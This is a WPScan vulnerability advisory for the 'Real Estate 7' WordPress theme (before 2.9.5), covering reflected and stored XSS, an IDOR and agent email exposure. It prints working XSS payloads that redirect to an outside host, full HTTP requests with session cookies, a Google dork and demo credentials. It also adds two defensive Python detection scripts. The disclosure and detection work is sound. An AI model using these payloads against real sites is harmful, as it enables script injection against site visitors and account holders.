WPScan

Themes Vulnerabilities

Real Estate 7 < 2.9.5 - Multiple Vulnerabilities

Description

Multiple vulnerabilities were discovered in the 'Real Estate 7' WordPress theme (tested version: v2.9.4):

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- Authenticated Persistent Self-XSS
- IDOR
- Information Exposure


Edit (WPScanTeam):
January 12th - Report Received & Envato Contacted
January 13th - Envato Investigating
January 13th - v2.9.5 released, fixing the issues

Proof of Concept

----[]- Info: -[]----
Demo website: https://contempothemes.com/wp-real-estate-7/elementor-demo/
Google Dork: /wp-content/themes/realestate-7/
Demo account #0: m0zePoC/asdasd (login/password)
Demo account #1: agent/agent (login/password)
PoC Profile #0: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/m0ze-m0ze/
PoC Profile #1: https://contempothemes.com/wp-real-estate-7/minimal-demo/agent/agent-demo/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC: https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E&ct_state&ct_zipcode&search-listings=true&ct_property_type&ct_ct_status&ct_beds_plus&ct_baths_plus&ct_community&ct_country&ct_mls&ct_rental_guests&ct_price_from&ct_price_to&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&lat&lng


----[]- Persistent XSS -> Agent Profile: -[]----
Vulnerable textarea: «Agent Testimonials» (the «Show on Agents Page» checkbox must be ticked).

Payload Sample: <img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/account-settings/ HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17074317185520
Content-Length: 3843
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/account-settings/
Cookie: wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579044656%7CbronP9c4LQmxfjR6G7rde3wkkIjs5f4KLP4uS2GE6d7%7C093dd537ad0162137d9dd0c1d3ab7c3d16fc2e0179b10eef5f47d740417dc11a; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; PHPSESSID=56b216626e434857c0241dc48f07871a5a391362; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; __stripe_sid=c972e371-07ad-479a-bb0d-1e937e4f6077; dsidx-visitor-results-views=2
Upgrade-Insecure-Requests: 1

-----------------------------17074317185520
Content-Disposition: form-data; name="first_name"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="last_name"

Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="nickname"

agent
-----------------------------17074317185520
Content-Disposition: form-data; name="display_name"

Agent Demo
-----------------------------17074317185520
Content-Disposition: form-data; name="user_url"


-----------------------------17074317185520
Content-Disposition: form-data; name="description"


-----------------------------17074317185520
Content-Disposition: form-data; name="twitterhandle"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="facebookurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="instagramurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="linkedinurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="youtubeurl"

#
-----------------------------17074317185520
Content-Disposition: form-data; name="isagent"

yes
-----------------------------17074317185520
Content-Disposition: form-data; name="agentorder"


-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_profile_img"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="mobile"

6195556589
-----------------------------17074317185520
Content-Disposition: form-data; name="fax"

6195556588
-----------------------------17074317185520
Content-Disposition: form-data; name="title"

Agent
-----------------------------17074317185520
Content-Disposition: form-data; name="tagline"

Selling the Dream!
-----------------------------17074317185520
Content-Disposition: form-data; name="agentlicense"

123456
-----------------------------17074317185520
Content-Disposition: form-data; name="userTestimonial"

<img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------17074317185520
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1024000
-----------------------------17074317185520
Content-Disposition: form-data; name="ct_broker_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragename"


-----------------------------17074317185520
Content-Disposition: form-data; name="brokeragelicense"


-----------------------------17074317185520
Content-Disposition: form-data; name="office"

6195553698
-----------------------------17074317185520
Content-Disposition: form-data; name="address"

101 Front St, Suite 100
-----------------------------17074317185520
Content-Disposition: form-data; name="city"

San Diego
-----------------------------17074317185520
Content-Disposition: form-data; name="state"

CA
-----------------------------17074317185520
Content-Disposition: form-data; name="postalcode"

92101
-----------------------------17074317185520
Content-Disposition: form-data; name="updateuser"

Update Profile
-----------------------------17074317185520
Content-Disposition: form-data; name="_wpnonce"

b2e5069987
-----------------------------17074317185520
Content-Disposition: form-data; name="_wp_http_referer"

/wp-real-estate-7/minimal-demo/account-settings/
-----------------------------17074317185520
Content-Disposition: form-data; name="action"

update-user
-----------------------------17074317185520--


----[]- Persistent Self-XSS -> Listing Email Alerts: -[]----
It's self-XSS, but still.

Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /wp-real-estate-7/minimal-demo/wp-admin/admin-ajax.php HTTP/1.1
Host: contempothemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 294
Origin: https://contempothemes.com
Connection: close
Referer: https://contempothemes.com/wp-real-estate-7/minimal-demo/listing-email-alerts/
Cookie: wordpress_sec_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7Cd622e8a525d082f2219e03f48ec47622cc28f13b6c1bfffef939cbd75ab70756; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1578871869; wordpress_logged_in_63bc6e7201d48db2e4918f48b5171dea=agent%7C1579047619%7C8wlsFqjeItUZEZltmKiVodHvIFmXrAlHzBjBQA1hzPO%7C8b9c07e16d6b093445f725ebb148990345f4ec8e712d60aa196cd134d92278dc; __stripe_mid=9dec3f56-2a9f-484e-9e46-57c24b4ac4b8; dsidx-visitor-results-views=11; PHPSESSID=23386885e76cc0b2eb15a06611a29dda06f8aaee; hwp_visit=1578874746788; hwp_new=true; __stripe_sid=bbfc5ced-5324-4818-b479-8c20006f2a9a

ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&pricefrom=&priceto=&ct_city=&ct_state=&zip=&ctea_alert_creation_nounce=3eebf51cdf&action=ct_alert_creation_save&ctea_email=agent%40somedomain.com
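Both the reflected XSS in the listing search (the ct_city query parameter above) and the stored payloads sent to the account-settings and admin-ajax.php endpoints put HTML markup into parameters that the theme treats as plain text. As an added example that is not part of this advisory or of the theme's code, the following Python script shows the detection side: it decodes the query string of combined-format access log lines (and, where a proxy or WAF logs them, urlencoded POST bodies), and flags the parameter names taken from the PoC requests on this page whenever their decoded value carries a tag, an inline event handler or a javascript: URL. The log lines and bodies are constructed for the demonstration.

```python
"""Added example (not from the advisory or the theme): flag HTML markup in
request parameters that this advisory shows being echoed or stored unescaped.
Sample log lines and bodies below are constructed for the demonstration."""
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the PoC requests on this page; treat them as
# plain text that must never carry markup. Extend for your own deployment.
WATCHED_PARAMS = {
    "ct_keyword", "ct_city", "ct_state", "ct_zipcode",  # listing search (reflected)
    "beds", "baths",                                    # email alert creation (stored)
    "userTestimonial",                                  # agent profile (stored)
}

# Tag start, inline event handler, or javascript: URL in a value that should be plain text.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

# Apache/nginx combined log format, enough of it to pull out client, method and target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def suspicious_values(params):
    """Return {name: decoded value} for watched parameters whose value contains markup.

    `params` is a list of (name, value) pairs as produced by urllib.parse.parse_qsl,
    so percent-encoding and '+' are already undone; HTML entities are undone here so
    an entity-encoded '&lt;img' does not slip past the check."""
    hits = {}
    for name, value in params:
        if name not in WATCHED_PARAMS:
            continue
        decoded = html.unescape(value)
        if MARKUP_RE.search(decoded):
            hits[name] = decoded
    return hits


def scan_log_line(line):
    """Parse one combined-format access log line.

    Returns (client_ip, path, hits) when a watched query parameter carries markup,
    None when the line is clean or does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    hits = suspicious_values(parse_qsl(target.query, keep_blank_values=True))
    if not hits:
        return None
    return m.group("ip"), target.path, hits


def scan_form_body(body):
    """Run the same check over an application/x-www-form-urlencoded POST body,
    e.g. the admin-ajax.php alert-creation request in the PoC (needs a proxy or
    WAF that logs bodies; ordinary access logs do not contain them)."""
    return suspicious_values(parse_qsl(body, keep_blank_values=True))


def scan_log(lines):
    """Return every finding from an iterable of log lines."""
    return [hit for hit in (scan_log_line(line) for line in lines) if hit is not None]


# Constructed sample data: one search request carrying a payload in ct_city,
# one ordinary search, one search with legitimate punctuation in the value.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2020:14:03:11 +0000] "GET /wp-real-estate-7/elementor-demo/'
    '?ct_keyword&ct_city=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E&search-listings=true'
    ' HTTP/1.1" 200 18422 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Jan/2020:14:05:42 +0000] "GET /wp-real-estate-7/elementor-demo/'
    '?ct_keyword=&ct_city=San%20Diego&ct_state=CA&search-listings=true HTTP/1.1" 200 18210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jan/2020:14:06:01 +0000] "GET /wp-real-estate-7/elementor-demo/'
    '?ct_city=O%27Brien%20%26%20Sons&search-listings=true HTTP/1.1" 200 18210 "-" "Mozilla/5.0"',
]

# Constructed body in the shape of the alert-creation request above (nonce omitted).
SAMPLE_ALERT_BODY = (
    "ct_property_type=0&ct_ct_status=0&beds=&baths=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E"
    "&pricefrom=&priceto=&ct_city=&ct_state=&zip=&action=ct_alert_creation_save"
)

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {hits}")
    print(scan_form_body(SAMPLE_ALERT_BODY))
```

The watch list is deliberately narrow so that ordinary free text (an apostrophe or an ampersand in a city name) does not alert; widen MARKUP_RE only after checking it against real traffic for the site, and remember that the fix belongs in the theme (sanitize on save, escape on output), with this check serving as detection for sites that have not yet updated to 2.9.5.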


----[]- IDOR: -[]----
Requesting this URL https://contempothemes.com/wp-real-estate-7/minimal-demo/?post_type=listings&p=XXXX with 1-4 digit values for the «p» parameter can lead to some interesting results, for example: https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/ and https://contempothemes.com/wp-real-estate-7/minimal-demo/package_order/order-starter-2019-12-30-182042/ (which reveal the package name, the order date and the unique login/author name).


----[]- Information Exposure: -[]----
Each agent profile page contains an «Email» link that triggers a pop-up form. This form contains a hidden input field holding the agent's (user's) unique email address, for example:
<input type="hidden" id="ctyouremail" name="ctyouremail" value="[email protected]" />

The same result can be obtained by viewing the source of the agent profile page (searching the source for the «@» character from the bottom is faster).
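As an added example that is not part of this advisory or of the theme's code, the following Python check parses rendered page HTML and flags hidden inputs whose value is an email address, which is the kind of regression test a theme's test suite should run against its templates to catch the pop-up contact form described above before it ships. The HTML fixture, the address and the replacement field name ctagentid are constructed; only the field name ctyouremail comes from this page.

```python
"""Added example (not from the advisory or the theme): a regression check that
flags hidden <input> elements whose value is an email address, the pattern the
advisory reports in the agent profile "Email" pop-up form. The HTML fixture is
constructed; the field name ctyouremail is the one shown on this page."""
import re
from html.parser import HTMLParser

# Deliberately simple address shape; the aim is to catch addresses in fields that
# should hold opaque ids or nonces, not to validate email syntax.
EMAIL_RE = re.compile(r"[^@\s\"'<>]+@[^@\s\"'<>]+\.[a-z]{2,}", re.IGNORECASE)


class HiddenEmailFinder(HTMLParser):
    """Collect (field name, value) for hidden inputs carrying an email address."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser also routes self-closing <input ... /> tags through here.
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() != "hidden":
            return
        if EMAIL_RE.fullmatch(a.get("value", "").strip()):
            self.findings.append((a.get("name") or a.get("id") or "?", a["value"]))


def find_hidden_emails(page_html):
    """Return [(name, address), ...] for every hidden input that leaks an address."""
    parser = HiddenEmailFinder()
    parser.feed(page_html)
    parser.close()
    return parser.findings


# Constructed fixture modelled on the pop-up contact form described above: one
# hidden field with the agent's address (the leak), one with a nonce (fine), and
# a visible field the visitor fills in (fine).
LEAKY_FORM = """
<form method="post" class="agent-contact">
  <input type="hidden" id="ctyouremail" name="ctyouremail" value="agent@example.com" />
  <input type="hidden" name="_wpnonce" value="0123456789" />
  <input type="email" name="visitor_email" value="" />
  <textarea name="message"></textarea>
</form>
"""

# The shape a fixed template should have (ctagentid is a hypothetical name): the
# server resolves the recipient from an opaque agent id, so no address reaches the page.
FIXED_FORM = LEAKY_FORM.replace(
    'id="ctyouremail" name="ctyouremail" value="agent@example.com"',
    'id="ctagentid" name="ctagentid" value="17"',
)

if __name__ == "__main__":
    print("leaky:", find_hidden_emails(LEAKY_FORM))
    print("fixed:", find_hidden_emails(FIXED_FORM))
```

Run it over the HTML your templates actually render (a fetched page from a staging site, or the output of the theme's template functions in a unit test) rather than over template source, since the address is only inserted at render time.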

Affects Themes

realestate-7
Fixed in version 2.9.5

References

URL
https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
URL
https://contempothemes.com/wp-real-estate-7/changelog/

Classification

Type

MULTI

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter twitter
m0ze_ru
Verified

No

WPVDB ID
5108792c-c847-4deb-999c-73065e8db74f

Timeline

Publicly Published

2020-01-14

Added

2020-01-14

Last Updated

2021-01-19
